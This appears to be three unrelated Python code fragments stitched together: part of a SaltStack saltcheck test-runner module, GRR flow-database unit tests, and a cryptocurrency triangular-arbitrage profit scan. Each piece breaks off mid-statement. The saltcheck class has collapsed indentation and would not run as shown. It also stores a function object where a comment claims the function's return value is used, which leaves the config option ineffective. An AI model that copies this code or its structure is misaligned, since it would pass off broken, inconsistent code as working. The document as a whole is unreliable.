    BUG FIX: the previous implementation discarded the looked-up value
    and always returned True, which made the config option ineffective.
    '''
    return __salt__['config.get']('auto_update_master_cache')
def _is_valid_function(module_name, function):
    '''Return True if *function* exists within *module_name* on this minion.'''
    full_name = "{0}.{1}".format(module_name, function)
    try:
        known_functions = __salt__['sys.list_functions'](module_name)
    except salt.exceptions.SaltException:
        # Fall back to a sentinel list so the membership test fails cleanly.
        known_functions = ["unable to look up functions"]
    return full_name in known_functions
def _get_top_states():
    '''
    Return the list of states from the "base" environment of the top file.
    Equivalent to the CLI: salt web state.show_top
    '''
    # The former try/except that immediately re-raised was a no-op and has
    # been removed; errors from state.show_top still propagate unchanged.
    returned = __salt__['state.show_top']()
    alt_states = list(returned['base'])
    # log.info("top states: {}".format(alt_states))
    return alt_states
def _get_state_sls(state):
    '''
    Return the unique sls names that make up *state*.
    Equivalent to the CLI: salt web state.show_low_sls STATE
    '''
    sls_names = []
    try:
        for low_chunk in __salt__['state.show_low_sls'](state):
            name = low_chunk['__sls__']
            if name not in sls_names:
                sls_names.append(name)
    except Exception:
        # raise
        # Deliberately best-effort: an unrenderable state simply
        # contributes no sls names (and therefore no tests).
        pass
    return sls_names
def _refresh_saltcheck_tests_dir(dirpath):
    '''
    Re-sync a saltcheck-tests directory from the master. Equivalent to:
        rm -rf dest-dir
        salt cp.get_dir salt://STATE/saltcheck-tests dest-dir
    '''
    __salt__['file.remove'](dirpath)
    path_parts = dirpath.split(os.sep)
    path_parts = [part for part in path_parts if part != '']  # drop empty chars
    # NOTE(review): slicing at index 6 assumes the minion file-cache layout
    # (/var/cache/salt/minion/files/base/<state>/...) -- confirm for
    # non-default cache roots.
    state = os.path.join(*path_parts[6:])
    source = "salt://" + state
    # Removed the unused "dest" local; cp.get_dir writes into dirpath.
    __salt__['cp.get_dir'](source, dirpath)
    return
class SaltCheck(object):
'''
This class implements the saltcheck
'''
def __init__(self):
# self.sls_list_top = []
self.sls_list_state = []
self.modules = []
self.results_dict = {}
self.results_dict_summary = {}
self.assertions_list = '''assertEqual assertNotEqual
assertTrue assertFalse
assertIn assertNotIn
assertGreater
assertGreaterEqual
assertLess assertLessEqual
assertEmpty assertNotEmpty'''.split()
self.auto_update_master_cache = _get_auto_update_cache_value
__opts__ = salt.config.minion_config('/etc/salt/minion')
__opts__['file_client'] = 'local'
self.salt_lc = salt.client.Caller(mopts=__opts__)
if self.auto_update_master_cache:
update_master_cache()
    def __is_valid_test(self, test_dict):
        '''Determine if a test contains:
        a test name,
        a valid module and function,
        a valid assertion,
        an expected return value - if assertion type requires it'''
        # Scoring scheme: each present/valid field earns one point and the
        # test is valid when the score reaches the required threshold.
        # 6 points needed for standard test
        # 4 points needed for test with assertion not requiring expected return
        tots = 0
        skip = test_dict.get('skip', False)
        m_and_f = test_dict.get('module_and_function', None)
        assertion = test_dict.get('assertion', None)
        exp_ret_key = 'expected-return' in test_dict.keys()
        exp_ret_val = test_dict.get('expected-return', None)
        log.info("__is_valid_test has test: {}".format(test_dict))
        if skip:
            # Skipped tests are always considered valid.
            required_total = 0
        elif m_and_f in ["saltcheck.state_apply"]:
            # state_apply setup steps only need a name and module.function;
            # the assertion is implied.
            required_total = 2
            assertion = "assertEmpty"
        elif assertion in ["assertEmpty",
                           "assertNotEmpty",
                           "assertTrue",
                           "assertFalse"]:
            # These assertions need no expected-return value.
            required_total = 4
        else:
            required_total = 6
        if m_and_f:
            tots += 1
            # NOTE(review): assumes exactly one dot in module_and_function;
            # a value like "a.b.c" would raise ValueError here -- confirm.
            module, function = m_and_f.split('.')
            if _is_valid_module(module):
                tots += 1
            if _is_valid_function(module, function):
                tots += 1
            log.info("__is_valid_test has valid m_and_f")
        if assertion in self.assertions_list:
            log.info("__is_valid_test has valid_assertion")
            tots += 1
        if exp_ret_key:
            tots += 1
        if exp_ret_val is not None:
            tots += 1
        # log the test score for debug purposes
        log.info("__test score: {} and required: {}".format(tots, required_total))
        return tots >= required_total
def call_salt_command(self,
fun,
args,
kwargs,
assertion_section):
'''Generic call of salt Caller command'''
value = False
try:
if args and kwargs:
value = self.salt_lc.cmd(fun, *args, **kwargs)
elif args and not kwargs:
value = self.salt_lc.cmd(fun, *args)
elif not args and kwargs:
value = self.salt_lc.cmd(fun, **kwargs)
else:
value = self.salt_lc.cmd(fun)
except salt.exceptions.SaltException:
raise
except Exception:
raise
if type(value) == dict and assertion_section:
return value.get(assertion_section, False)
else:
return value
def run_test(self, test_dict):
'''Run a single saltcheck test'''
start = time.time()
if self.__is_valid_test(test_dict):
skip = test_dict.get('skip', False)
if skip:
return {'status': 'Skip', 'duration': 0.0}
mod_and_func = test_dict['module_and_function']
assertion_section = test_dict.get('assertion_section', None)
args = test_dict.get('args', None)
kwargs = test_dict.get('kwargs', None)
pillar_data = test_dict.get('pillar-data', None)
if pillar_data:
if not kwargs:
kwargs = {}
kwargs['pillar'] = pillar_data
else:
# make sure we clean pillar from previous test
if kwargs:
try:
kwargs.pop('pillar')
except:
pass
if mod_and_func in ["saltcheck.state_apply"]:
assertion = "assertEmpty"
else:
assertion = test_dict['assertion']
expected_return = test_dict.get('expected-return', None)
actual_return = self.call_salt_command(mod_and_func, args, kwargs, assertion_section)
if assertion not in ["assertIn", "assertNotIn", "assertEmpty", "assertNotEmpty",
"assertTrue", "assertFalse"]:
expected_return = self.cast_expected_to_returned_type(expected_return, actual_return)
if assertion == "assertEqual":
value = self.__assert_equal(expected_return, actual_return)
elif assertion == "assertNotEqual":
value = self.__assert_not_equal(expected_return, actual_return)
elif assertion == "assertTrue":
value = self.__assert_true(actual_return)
elif assertion == "assertFalse":
value = self.__assert_false(actual_return)
elif assertion == "assertIn":
value = self.__assert_in(expected_return, actual_return)
elif assertion == "assertNotIn":
value = self.__assert_not_in(expected_return, actual_return)
elif assertion == "assertGreater":
value = self.__assert_greater(expected_return, actual_return)
elif assertion == "assertGreaterEqual":
value = self.__assert_greater_equal(expected_return, actual_return)
elif assertion == "assertLess":
value = self.__assert_less(expected_return, actual_return)
elif assertion == "assertLessEqual":
value = self.__assert_less_equal(expected_return, actual_return)
elif assertion == "assertEmpty":
value = self.__assert_empty(actual_return)
elif assertion == "assertNotEmpty":
value = self.__assert_not_empty(actual_return)
else:
value = "Fail - bas assertion"
else:
value = "Fail - | |
#!/usr/bin/env python
# Lint as: python3
# -*- encoding: utf-8 -*-
"""Tests for the flow database api."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import queue
import random
import time
import mock
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import file_finder as rdf_file_finder
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.util import compatibility
from grr_response_server import flow
from grr_response_server.databases import db
from grr_response_server.flows import file
from grr_response_server.rdfvalues import flow_objects as rdf_flow_objects
from grr_response_server.rdfvalues import flow_runner as rdf_flow_runner
from grr_response_server.rdfvalues import hunt_objects as rdf_hunt_objects
from grr_response_server.rdfvalues import objects as rdf_objects
from grr.test_lib import test_lib
class DatabaseTestFlowMixin(object):
"""An abstract class for testing db.Database implementations.
This mixin adds methods to test the handling of flows.
"""
  def _SetupClient(self, client_id=None):
    """Writes client metadata (default id if none given); returns the id."""
    client_id = client_id or u"C.1234567890123456"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    return client_id
  def _SetupClientAndFlow(self, client_id=None, **additional_flow_args):
    """Creates a client plus one flow on it; returns (client_id, flow_id)."""
    client_id = self._SetupClient(client_id)
    flow_id = flow.RandomFlowId()
    rdf_flow = rdf_flow_objects.Flow(
        client_id=client_id,
        flow_id=flow_id,
        create_time=rdfvalue.RDFDatetime.Now(),
        **additional_flow_args)
    self.db.WriteFlowObject(rdf_flow)
    return client_id, flow_id
  def _SetupUser(self, username="foo"):
    """Registers a GRR user and returns the username."""
    self.db.WriteGRRUser(username)
    return username
  def testClientActionRequestStorage(self):
    """Client action requests can be written, read back, and deleted."""
    client_id, flow_id = self._SetupClientAndFlow()
    self.db.WriteFlowRequests([
        rdf_flow_objects.FlowRequest(
            client_id=client_id, flow_id=flow_id, request_id=1)
    ])
    req = rdf_flows.ClientActionRequest(
        client_id=client_id, flow_id=flow_id, request_id=1)
    self.db.WriteClientActionRequests([req])
    read_reqs = self.db.ReadAllClientActionRequests(client_id)
    self.assertLen(read_reqs, 1)
    self.assertEqual(req, read_reqs[0])
    self.db.DeleteClientActionRequests([req])
    read_reqs = self.db.ReadAllClientActionRequests(client_id)
    self.assertEmpty(read_reqs)
    # Extra delete should not raise.
    self.db.DeleteClientActionRequests([req])
    # Deleting the same message multiple times is an error.
    with self.assertRaises(ValueError):
      self.db.DeleteClientActionRequests([req, req])
  def testWriteClientActionRequestsRaisesOnUnknownRequest(self):
    """Writing a client action request without its flow request raises."""
    req = rdf_flows.ClientActionRequest(
        client_id=u"C.1234567890000000", flow_id="ABCD1234", request_id=5)
    with self.assertRaises(db.AtLeastOneUnknownRequestError):
      self.db.WriteClientActionRequests([req])
  def testClientActionRequestUpdate(self):
    """Re-writing an existing request overwrites it; last write wins."""
    client_id, flow_id = self._SetupClientAndFlow()
    req = rdf_flows.ClientActionRequest(
        client_id=client_id, flow_id=flow_id, request_id=1)
    self.db.WriteFlowRequests([
        rdf_flow_objects.FlowRequest(
            client_id=client_id, flow_id=flow_id, request_id=1)
    ])
    cpu_limit = req.cpu_limit_ms
    self.assertGreater(cpu_limit, 1000000)
    # Each write lowers the limit; the read must reflect the final value.
    for _ in range(5):
      req.cpu_limit_ms -= 100000
      self.db.WriteClientActionRequests([req])
    read_reqs = self.db.ReadAllClientActionRequests(client_id)
    self.assertLen(read_reqs, 1)
    self.assertEqual(req, read_reqs[0])
  def testClientActionRequestLeasing(self):
    """Leases respect the limit, stamp expiry/owner, and expire over time."""
    client_id, flow_id = self._SetupClientAndFlow()
    flow_requests = []
    client_requests = []
    for i in range(10):
      flow_requests.append(
          rdf_flow_objects.FlowRequest(
              client_id=client_id, flow_id=flow_id, request_id=i))
      client_requests.append(
          rdf_flows.ClientActionRequest(
              client_id=client_id, flow_id=flow_id, request_id=i))
    lease_time = rdfvalue.Duration.From(5, rdfvalue.MINUTES)
    self.db.WriteFlowRequests(flow_requests)
    self.db.WriteClientActionRequests(client_requests)
    t0 = rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100000)
    with test_lib.FakeTime(t0):
      t0_expiry = t0 + lease_time
      leased = self.db.LeaseClientActionRequests(
          client_id, lease_time=lease_time, limit=5)
      self.assertLen(leased, 5)
      for request in leased:
        self.assertEqual(request.leased_until, t0_expiry)
        self.assertEqual(request.leased_by, utils.ProcessIdString())
    t1 = rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100000 + 100)
    with test_lib.FakeTime(t1):
      t1_expiry = t1 + lease_time
      leased = self.db.LeaseClientActionRequests(
          client_id, lease_time=lease_time, limit=5)
      self.assertLen(leased, 5)
      for request in leased:
        self.assertEqual(request.leased_until, t1_expiry)
        self.assertEqual(request.leased_by, utils.ProcessIdString())
    # Nothing left to lease.
    leased = self.db.LeaseClientActionRequests(
        client_id, lease_time=lease_time, limit=2)
    self.assertEmpty(leased)
    read = self.db.ReadAllClientActionRequests(client_id)
    self.assertLen(read, 10)
    for r in read:
      self.assertEqual(r.leased_by, utils.ProcessIdString())
    self.assertLen([r for r in read if r.leased_until == t0_expiry], 5)
    self.assertLen([r for r in read if r.leased_until == t1_expiry], 5)
    # Half the leases expired.
    t2 = rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100000 + 350)
    with test_lib.FakeTime(t2):
      leased = self.db.LeaseClientActionRequests(
          client_id, lease_time=lease_time)
      self.assertLen(leased, 5)
    # All of them expired.
    t3 = rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100000 + 10350)
    with test_lib.FakeTime(t3):
      leased = self.db.LeaseClientActionRequests(
          client_id, lease_time=lease_time)
      self.assertLen(leased, 10)
  def testClientActionRequestsTTL(self):
    """Each lease decrements the TTL; exhausted requests are removed."""
    client_id, flow_id = self._SetupClientAndFlow()
    flow_requests = []
    client_requests = []
    for i in range(10):
      flow_requests.append(
          rdf_flow_objects.FlowRequest(
              client_id=client_id, flow_id=flow_id, request_id=i))
      client_requests.append(
          rdf_flows.ClientActionRequest(
              client_id=client_id, flow_id=flow_id, request_id=i))
    self.db.WriteFlowRequests(flow_requests)
    self.db.WriteClientActionRequests(client_requests)
    reqs = self.db.ReadAllClientActionRequests(client_id)
    self.assertLen(reqs, 10)
    for request in reqs:
      self.assertEqual(request.ttl, db.Database.CLIENT_MESSAGES_TTL)
    now = rdfvalue.RDFDatetime.Now()
    lease_time = rdfvalue.Duration.From(60, rdfvalue.SECONDS)
    # Lease repeatedly, letting each lease expire before the next one.
    for i in range(db.Database.CLIENT_MESSAGES_TTL):
      now += rdfvalue.Duration.From(120, rdfvalue.SECONDS)
      with test_lib.FakeTime(now):
        leased = self.db.LeaseClientActionRequests(
            client_id, lease_time=lease_time, limit=10)
        self.assertLen(leased, 10)
        # Check that the ttl is read.
        for request in leased:
          self.assertEqual(request.ttl, db.Database.CLIENT_MESSAGES_TTL - i - 1)
        reqs = self.db.ReadAllClientActionRequests(client_id)
        self.assertLen(reqs, 10)
        for request in reqs:
          self.assertEqual(request.ttl, db.Database.CLIENT_MESSAGES_TTL - i - 1)
    now += rdfvalue.Duration.From(120, rdfvalue.SECONDS)
    with test_lib.FakeTime(now):
      leased = self.db.LeaseClientActionRequests(
          client_id, lease_time=lease_time, limit=10)
      self.assertEmpty(leased)
    # ReadAllClientActionRequests includes also requests whose TTL has
    # expired. Make sure that the requests have been deleted from the db.
    self.assertEqual(self.db.ReadAllClientActionRequests(client_id), [])
  def testFlowWritingUnknownClient(self):
    """Writing a flow for a client with no metadata raises."""
    flow_id = u"1234ABCD"
    client_id = u"C.1234567890123456"
    rdf_flow = rdf_flow_objects.Flow(
        client_id=client_id,
        flow_id=flow_id,
        create_time=rdfvalue.RDFDatetime.Now())
    with self.assertRaises(db.UnknownClientError):
      self.db.WriteFlowObject(rdf_flow)
  def testFlowWriting(self):
    """A written flow reads back equal; unknown ids raise."""
    flow_id = u"1234ABCD"
    client_id = u"C.1234567890123456"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    rdf_flow = rdf_flow_objects.Flow(
        client_id=client_id,
        flow_id=flow_id,
        long_flow_id=f"{client_id}/{flow_id}",
        next_request_to_process=4,
        create_time=rdfvalue.RDFDatetime.Now())
    self.db.WriteFlowObject(rdf_flow)
    read_flow = self.db.ReadFlowObject(client_id, flow_id)
    # Last update time has changed, everything else should be equal.
    read_flow.last_update_time = None
    self.assertEqual(read_flow, rdf_flow)
    # Invalid flow id or client id raises.
    with self.assertRaises(db.UnknownFlowError):
      self.db.ReadFlowObject(client_id, u"1234AAAA")
    with self.assertRaises(db.UnknownFlowError):
      self.db.ReadFlowObject(u"C.1234567890000000", flow_id)
  def testFlowOverwrite(self):
    """Re-writing an existing flow object overwrites the stored copy."""
    flow_id = u"1234ABCD"
    client_id = u"C.1234567890123456"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    rdf_flow = rdf_flow_objects.Flow(
        client_id=client_id,
        flow_id=flow_id,
        next_request_to_process=4,
        create_time=rdfvalue.RDFDatetime.Now())
    self.db.WriteFlowObject(rdf_flow)
    read_flow = self.db.ReadFlowObject(client_id, flow_id)
    # Last update time has changed, everything else should be equal.
    read_flow.last_update_time = None
    self.assertEqual(read_flow, rdf_flow)
    # Now change the flow object.
    rdf_flow.next_request_to_process = 5
    self.db.WriteFlowObject(rdf_flow)
    read_flow_after_update = self.db.ReadFlowObject(client_id, flow_id)
    self.assertEqual(read_flow_after_update.next_request_to_process, 5)
  def testFlowOverwriteFailsWithAllowUpdateFalse(self):
    """With allow_update=False a second write raises and changes nothing."""
    flow_id = u"1234ABCD"
    client_id = u"C.1234567890123456"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    rdf_flow = rdf_flow_objects.Flow(
        client_id=client_id,
        flow_id=flow_id,
        next_request_to_process=4,
        create_time=rdfvalue.RDFDatetime.Now())
    self.db.WriteFlowObject(rdf_flow, allow_update=False)
    # Now change the flow object.
    rdf_flow.next_request_to_process = 5
    with self.assertRaises(db.FlowExistsError) as context:
      self.db.WriteFlowObject(rdf_flow, allow_update=False)
    self.assertEqual(context.exception.client_id, client_id)
    self.assertEqual(context.exception.flow_id, flow_id)
    # The stored flow must be unchanged by the failed write.
    read_flow_after_update = self.db.ReadFlowObject(client_id, flow_id)
    self.assertEqual(read_flow_after_update.next_request_to_process, 4)
  def testFlowTimestamp(self):
    """create_time is set by the database within the write window."""
    client_id = "C.0123456789012345"
    flow_id = "0F00B430"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    before_timestamp = rdfvalue.RDFDatetime.Now()
    flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
    self.db.WriteFlowObject(flow_obj)
    after_timestamp = rdfvalue.RDFDatetime.Now()
    flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
    self.assertBetween(flow_obj.create_time, before_timestamp, after_timestamp)
  def testFlowTimestampWithMissingCreationTime(self):
    """An explicitly cleared create_time is still filled in on write."""
    client_id = "C.0123456789012345"
    flow_id = "0F00B430"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    before_timestamp = rdfvalue.RDFDatetime.Now()
    flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
    flow_obj.create_time = None
    self.db.WriteFlowObject(flow_obj)
    after_timestamp = rdfvalue.RDFDatetime.Now()
    flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
    self.assertBetween(flow_obj.create_time, before_timestamp, after_timestamp)
  def testFlowNameWithMissingNameInProtobuf(self):
    """Updating with an unset flow_class_name keeps the stored name."""
    client_id = "C.0123456789012345"
    flow_id = "0F00B430"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
    flow_obj.flow_class_name = "Quux"
    self.db.WriteFlowObject(flow_obj)
    flow_obj.flow_class_name = None
    self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
    flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
    self.assertEqual(flow_obj.flow_class_name, "Quux")
  def testFlowKeyMetadataUnchangable(self):
    """UpdateFlow cannot alter the flow's key fields (client/flow ids)."""
    client_id = "C.0123456789012345"
    flow_id = "0F00B430"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
    flow_obj.long_flow_id = f"{client_id}/{flow_id}"
    self.db.WriteFlowObject(flow_obj)
    flow_obj.client_id = "C.0123456789ABCDEF"
    flow_obj.flow_id = "0B43F0000"
    flow_obj.long_flow_id = f"{flow_obj.client_id}/{flow_obj.flow_id}"
    self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
    flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
    self.assertEqual(flow_obj.client_id, client_id)
    self.assertEqual(flow_obj.flow_id, flow_id)
    self.assertEqual(flow_obj.long_flow_id, f"{client_id}/{flow_id}")
  def testFlowParentMetadataUnchangable(self):
    """UpdateFlow cannot alter parent flow/hunt ids after creation."""
    client_id = "C.0123456789012345"
    flow_id = "0F00B430"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
    flow_obj.parent_flow_id = "0B43F000"
    flow_obj.parent_hunt_id = "48151623"
    self.db.WriteFlowObject(flow_obj)
    flow_obj.parent_flow_id = "08133780"
    flow_obj.parent_hunt_id = "01081080"
    self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
    flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
    self.assertEqual(flow_obj.parent_flow_id, "0B43F000")
    self.assertEqual(flow_obj.parent_hunt_id, "48151623")
  def testFlowNameUnchangable(self):
    """UpdateFlow cannot alter flow_class_name after creation."""
    client_id = "C.0123456789012345"
    flow_id = "0F00B430"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
    flow_obj.flow_class_name = "Quux"
    self.db.WriteFlowObject(flow_obj)
    flow_obj.flow_class_name = "Norf"
    self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
    flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
    self.assertEqual(flow_obj.flow_class_name, "Quux")
  def testFlowCreatorUnchangable(self):
    """UpdateFlow cannot alter the creator after creation."""
    client_id = "C.0123456789012345"
    flow_id = "0F00B430"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
    flow_obj.creator = "norf"
    self.db.WriteFlowObject(flow_obj)
    flow_obj.creator = "thud"
    self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
    flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
    self.assertEqual(flow_obj.creator, "norf")
  def testFlowCreatorUnsetInProtobuf(self):
    """Updating with an unset creator keeps the stored creator."""
    client_id = "C.0123456789012345"
    flow_id = "0F00B430"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
    flow_obj.creator = "norf"
    self.db.WriteFlowObject(flow_obj)
    flow_obj.creator = None
    self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
    flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
    self.assertEqual(flow_obj.creator, "norf")
  def testReadAllFlowObjects(self):
    """ReadAllFlowObjects returns flows across clients, children included."""
    client_id_1 = "C.1111111111111111"
    client_id_2 = "C.2222222222222222"
    self.db.WriteClientMetadata(client_id_1, fleetspeak_enabled=False)
    self.db.WriteClientMetadata(client_id_2, fleetspeak_enabled=False)
    # Write a flow and a child flow for client 1.
    flow1 = rdf_flow_objects.Flow(
        client_id=client_id_1,
        flow_id="000A0001",
        create_time=rdfvalue.RDFDatetime.Now())
    self.db.WriteFlowObject(flow1)
    flow2 = rdf_flow_objects.Flow(
        client_id=client_id_1,
        flow_id="000A0002",
        parent_flow_id="000A0001",
        create_time=rdfvalue.RDFDatetime.Now())
    self.db.WriteFlowObject(flow2)
    # Same flow id for client 2.
    flow3 = rdf_flow_objects.Flow(
        client_id=client_id_2,
        flow_id="000A0001",
        create_time=rdfvalue.RDFDatetime.Now())
    self.db.WriteFlowObject(flow3)
    flows = self.db.ReadAllFlowObjects()
    self.assertCountEqual([f.flow_id for f in flows],
                          ["000A0001", "000A0002", "000A0001"])
  def testReadAllFlowObjectsWithMinCreateTime(self):
    """min_create_time filters out flows created earlier (boundary kept)."""
    now = rdfvalue.RDFDatetime.Now()
    client_id_1 = "C.1111111111111111"
    self.db.WriteClientMetadata(client_id_1, fleetspeak_enabled=False)
    self.db.WriteFlowObject(
        rdf_flow_objects.Flow(
            client_id=client_id_1,
            flow_id="0000001A",
            create_time=now - rdfvalue.Duration.From(2, rdfvalue.HOURS)))
    self.db.WriteFlowObject(
        rdf_flow_objects.Flow(
            client_id=client_id_1,
            flow_id="0000001B",
            create_time=now - rdfvalue.Duration.From(1, rdfvalue.HOURS)))
    flows = self.db.ReadAllFlowObjects(
        min_create_time=now - rdfvalue.Duration.From(1, rdfvalue.HOURS))
    self.assertEqual([f.flow_id for f in flows], ["0000001B"])
  def testReadAllFlowObjectsWithMaxCreateTime(self):
    """max_create_time filters out flows created later (boundary kept)."""
    now = rdfvalue.RDFDatetime.Now()
    client_id_1 = "C.1111111111111111"
    self.db.WriteClientMetadata(client_id_1, fleetspeak_enabled=False)
    self.db.WriteFlowObject(
        rdf_flow_objects.Flow(
            client_id=client_id_1,
            flow_id="0000001A",
            create_time=now - rdfvalue.Duration.From(2, rdfvalue.HOURS)))
    self.db.WriteFlowObject(
        rdf_flow_objects.Flow(
            client_id=client_id_1,
            flow_id="0000001B",
            create_time=now - rdfvalue.Duration.From(1, rdfvalue.HOURS)))
    flows = self.db.ReadAllFlowObjects(
        max_create_time=now - rdfvalue.Duration.From(2, rdfvalue.HOURS))
    self.assertEqual([f.flow_id for f in flows], ["0000001A"])
def testReadAllFlowObjectsWithClientID(self):
    """ReadAllFlowObjects returns only flows belonging to the requested client."""
    now = rdfvalue.RDFDatetime.Now()
    # One flow per client.
    flows_by_client = [("C.1111111111111111", "0000001A"),
                       ("C.2222222222222222", "0000001B")]
    for client_id, flow_id in flows_by_client:
        self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
        self.db.WriteFlowObject(
            rdf_flow_objects.Flow(
                client_id=client_id, flow_id=flow_id, create_time=now))
    flows = self.db.ReadAllFlowObjects(client_id="C.1111111111111111")
    self.assertEqual([f.flow_id for f in flows], ["0000001A"])
def testReadAllFlowObjectsWithoutChildren(self):
    """include_child_flows=False filters out flows that have a parent flow."""
    now = rdfvalue.RDFDatetime.Now()
    client_id = "C.1111111111111111"
    self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
    # A top-level flow plus one child flow of it.
    for flow_id, parent_id in (("0000001A", None), ("0000001B", "0000001A")):
        kwargs = dict(client_id=client_id, flow_id=flow_id, create_time=now)
        if parent_id is not None:
            kwargs["parent_flow_id"] = parent_id
        self.db.WriteFlowObject(rdf_flow_objects.Flow(**kwargs))
    flows = self.db.ReadAllFlowObjects(include_child_flows=False)
    # Only the parentless flow survives the filter.
    self.assertEqual([f.flow_id for f in flows], ["0000001A"])
def testReadAllFlowObjectsWithAllConditions(self):
    """All ReadAllFlowObjects filters combined leave exactly one matching flow."""
    now = rdfvalue.RDFDatetime.Now()
    client_id_1 = "C.1111111111111111"
    client_id_2 = "C.2222222222222222"
    self.db.WriteClientMetadata(client_id_1, fleetspeak_enabled=False)
    self.db.WriteClientMetadata(client_id_2, fleetspeak_enabled=False)
    one_second = rdfvalue.Duration.From(1, rdfvalue.SECONDS)
    # (client, flow id, parent flow id, create time). Each row after the first
    # is excluded by exactly one filter: child flow, too old, too new, wrong
    # client.
    flow_specs = [
        (client_id_1, "0000000A", None, now),
        (client_id_1, "0000000B", "0000000A", now),
        (client_id_1, "0000000C", None, now - one_second),
        (client_id_1, "0000000D", None, now + one_second),
        (client_id_2, "0000000E", None, now),
    ]
    for client_id, flow_id, parent_id, create_time in flow_specs:
        kwargs = dict(client_id=client_id, flow_id=flow_id, create_time=create_time)
        if parent_id is not None:
            kwargs["parent_flow_id"] = parent_id
        self.db.WriteFlowObject(rdf_flow_objects.Flow(**kwargs))
    flows = self.db.ReadAllFlowObjects(
        client_id=client_id_1,
        min_create_time=now,
        max_create_time=now,
        include_child_flows=False)
    self.assertEqual([f.flow_id for f in flows], ["0000000A"])
def testUpdateUnknownFlow(self):
    """UpdateFlow raises UnknownFlowError for a client id that has no such flow."""
    _, flow_id = self._SetupClientAndFlow()
    crash = rdf_client.ClientCrash(crash_message="oh no")
    # The flow exists, but not under this (unknown) client id.
    with self.assertRaises(db.UnknownFlowError):
        self.db.UpdateFlow(u"C.1234567890AAAAAA", flow_id, client_crash_info=crash)
def testFlowUpdateChangesAllFields(self):
client_id, flow_id = self._SetupClientAndFlow()
flow_obj = self.db.ReadFlowObject(client_id, flow_id)
flow_obj.cpu_time_used.user_cpu_time = 0.5
flow_obj.cpu_time_used.system_cpu_time = 1.5
flow_obj.num_replies_sent = 10
flow_obj.network_bytes_sent = 100
self.db.UpdateFlow(client_id, flow_id, flow_obj=flow_obj)
read_flow = self.db.ReadFlowObject(client_id, flow_id)
# Last | |
+str(currDCRBTCAsk) +" -> Sell DCR for " +str(currDCREURBid) +"€ = " +str("%.3f" % arb12_profitA))
# Triangular-arbitrage scan over EUR/BTC/coin order-book quotes. For each coin
# X two routes are evaluated and printed when the percentage gain reaches
# `min_profit`:
#   route A: EUR -> BTC -> X -> EUR (buy BTC at ask, buy X at BTC ask, sell X at EUR bid)
#   route B: EUR -> X -> BTC -> EUR (buy X at EUR ask, sell X at BTC bid, sell BTC at EUR bid)
# Profits are percentages; safe_division presumably guards against a zero
# denominator — TODO confirm its behavior for 0.
# NOTE(review): fees/slippage are not included in these formulas — confirm
# min_profit is chosen to cover them.
arb12_profitB = safe_division((currDCRBTCBid*currBTCEURBid - currDCREURAsk)*100.0,currDCREURAsk)
if arb12_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy DCR " +str(currDCREURAsk) +"€ -> Sell DCR " +str(currDCRBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb12_profitB))
#DGB
arb13_profitA = safe_division((currDGBEURBid - (currDGBBTCAsk*currBTCEURAsk))*100.0,currDGBBTCAsk*currBTCEURAsk)
if arb13_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy DGB " +str(currDGBBTCAsk) +" -> Sell DGB for " +str(currDGBEURBid) +"€ = " +str("%.3f" % arb13_profitA))
arb13_profitB = safe_division((currDGBBTCBid*currBTCEURBid - currDGBEURAsk)*100.0,currDGBEURAsk)
if arb13_profitB >= min_profit:
